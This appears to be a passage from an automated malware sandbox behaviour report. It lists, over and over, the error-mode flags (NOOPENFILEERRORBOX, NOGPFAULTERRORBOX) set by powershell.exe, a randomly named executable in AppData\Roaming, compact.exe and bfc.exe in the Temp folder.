Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\compact.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\compact.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\compact.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\compact.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\compact.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\compact.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\compact.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\compact.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\compact.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\compact.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\compact.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\compact.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\compact.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\compact.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\compact.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\compact.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\compact.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bfc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bfc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bfc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
